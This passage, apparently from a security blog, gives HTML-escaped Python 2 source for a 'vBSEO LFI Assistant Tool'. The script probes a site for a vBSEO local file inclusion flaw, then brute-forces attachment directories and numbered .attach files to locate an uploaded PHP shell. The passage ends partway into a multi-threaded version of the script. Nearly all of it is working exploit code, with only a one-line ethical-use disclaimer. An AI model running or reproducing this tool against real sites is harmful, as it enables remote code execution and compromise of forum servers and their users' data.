&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Cannot clear screen automatically.&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;File Finder by MaXe from InterN0T.net&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Get user-input and define global variables.&lt;/span&gt;&lt;br /&gt;
target = &lt;span class=&quot;kw2&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;Enter a domain to scan: &quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
file_match = &lt;span class=&quot;kw2&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;Enter a keyword to look for: &quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;attach&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;attachment&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;attachments&quot;&lt;/span&gt;,&lt;span class=&quot;st0&quot;&gt;&quot;download&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
poss_main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
sub_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Strip away http and https from the target variable.&lt;/span&gt;&lt;br /&gt;
striptarget = &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;kw2&quot;&gt;compile&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&#39;(http://|https://)&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
newtarget = striptarget.&lt;span class=&quot;me1&quot;&gt;sub&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&#39;&#39;&lt;/span&gt;, target&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Perform a simple LFI to check whether the target is vulnerable or not.&lt;/span&gt;&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Checking if site appears to be vulnerable.&quot;&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;GET&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/vbseo.php?vbseoembedd=1&amp;amp;vbseourl=./clientscript/ieprompt.html&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# If the response code is 200 OK, check if the file really was included.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;200&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Site is responding, this is good.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;(Enter text...)&quot;&lt;/span&gt;, resp.&lt;span class=&quot;me1&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;&amp;gt;&amp;gt; The site appears to be vulnerable!&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] The site appears to be patched. (unknown error)&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;elif&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;404&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] The site appears to be patched. (404)&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Search for attachment directories&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;for&lt;/span&gt; value &lt;span class=&quot;kw1&quot;&gt;in&lt;/span&gt; main_dir&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;:&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Trying: http://%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget,value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;HEAD&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# If the response code is 403 (Forbidden), set a new variable and continue.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;403&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Directory found: /%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; value&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; poss_main_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
poss_main_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; value&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
poss_main_dir += &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; value&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; poss_main_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] No directories were found, exiting.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Search for possible sub directories&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;for&lt;/span&gt; value &lt;span class=&quot;kw1&quot;&gt;in&lt;/span&gt; poss_main_dir:&lt;br /&gt;
&lt;br /&gt;
i = &lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[*] Trying subdirs within: http://%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget,value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;while&lt;/span&gt; i &lt;span class=&quot;sy0&quot;&gt;&amp;amp;&lt;/span&gt;lt&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;= &lt;span class=&quot;nu0&quot;&gt;9&lt;/span&gt;: &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;HEAD&quot;&lt;/span&gt;, &amp;nbsp;&lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;403&lt;/span&gt;: &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] Sub Directory found: /%s/%s/&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; found = &lt;span class=&quot;st0&quot;&gt;&quot;%s/%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; sub_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; sub_dir = &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; found&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw1&quot;&gt;else&lt;/span&gt;: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; sub_dir += &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; found&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; i=i+&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; sub_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;: &amp;nbsp;&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] No sub directories were found, exiting.&quot;&lt;/span&gt; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;co1&quot;&gt;#  Search all the sub directories found for our phile for value in  sub_dir[0:]: &amp;nbsp; i = 99 &amp;nbsp;print &quot;[*] Trying to find our file within: /%s/&quot; %  value &amp;nbsp; &amp;nbsp;while i &amp;gt;= 0:&lt;/span&gt;&lt;br /&gt;
conn = &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;HTTPConnection&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget, &lt;span class=&quot;nu0&quot;&gt;80&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;request&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;GET&quot;&lt;/span&gt;, &lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s.attach&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
resp = conn.&lt;span class=&quot;me1&quot;&gt;getresponse&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; resp.&lt;span class=&quot;me1&quot;&gt;status&lt;/span&gt; == &lt;span class=&quot;nu0&quot;&gt;200&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[+] File found, does it match our keyword? &amp;gt;&amp;gt;%s&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; file_match&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;(%s)&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; file_match, resp.&lt;span class=&quot;me1&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;&amp;gt;&amp;gt; File contains our keyword!&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Part URL: /%s/%s.attach&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Full URL: http://&quot;&lt;/span&gt; + newtarget + &lt;span class=&quot;st0&quot;&gt;&quot;/%s/%s.attach &lt;span class=&quot;es0&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;value,i&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
i=i-&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;br /&gt;
conn.&lt;span class=&quot;me1&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Don&#39;t forget, that this script can be used for more than one thing.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;The multi-threaded version is shown  below. Keep in mind that the multi-threaded version is a bit buggy,  because I didn’t synchronize the threads.&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;codecolorer-container python twitlight&quot; style=&quot;height: 300px; overflow: auto; white-space: nowrap;&quot;&gt;&lt;div class=&quot;python codecolorer&quot;&gt;&lt;span class=&quot;co1&quot;&gt;#!/usr/bin/python&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp;______ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;__ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;__ &amp;nbsp;__ &amp;nbsp; &amp;nbsp; __ &amp;nbsp; ______&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# /\__ &amp;nbsp;_\ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/\ \__ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;/\ \/\ \ &amp;nbsp;/&#39;__`\/\__ &amp;nbsp;_\&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# \/_/\ \/ &amp;nbsp; &amp;nbsp; ___\ \ ,_\ &amp;nbsp; &amp;nbsp;__ &amp;nbsp; _ __\ \ `\\ \/\ \/\ \/_/\ \/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp;\ \ \ &amp;nbsp; /&#39; _ `\ \ \/ &amp;nbsp;/&#39;__`\/\`&#39;__\ \ , ` \ \ \ \ \ \ \ \&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; \_\ \__/\ \/\ \ \ \_/\ &amp;nbsp;__/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; /\_____\ \_\ \_\ \__\ \____\\ \_\ &amp;nbsp;\ \_\ \_\ \____/ &amp;nbsp;\ \_\&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; \/_____/\/_/\/_/\/__/\/____/ \/_/ &amp;nbsp; \/_/\/_/\/___/ &amp;nbsp; &amp;nbsp;\/_/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp;--------------------------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; Title:&amp;nbsp; vBSEO LFI Assistant Tool&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Author:&amp;nbsp; MaXe&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Site: &amp;nbsp;http://www.intern0t.net&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; Description: &amp;nbsp;1) Checks whether the vBSEO installation&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; is patched or not. 2) Attempts to find&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; the physical location of an uploaded&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; attachment phile. (PHP Shell)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Version:&amp;nbsp; 2.2.3 - Multi-Threading! - Basic Version&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; License:&amp;nbsp; -- Attribution-ShareAlike 3.0 Unported --&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; http://creativecommons.org/licenses/by-sa/3.0/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; Notes:&amp;nbsp; Please note, that this tool does not work on&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; all types of hosts and you should therefore&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; modify this script to your own needs.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Multi-Threading in this tool is very buggy!&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp;Disclaimer:&amp;nbsp; This tool is meant for ethical purposes only.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Import the appropriate libraries.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;os&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;re&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;httplib&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;thread&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;time&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
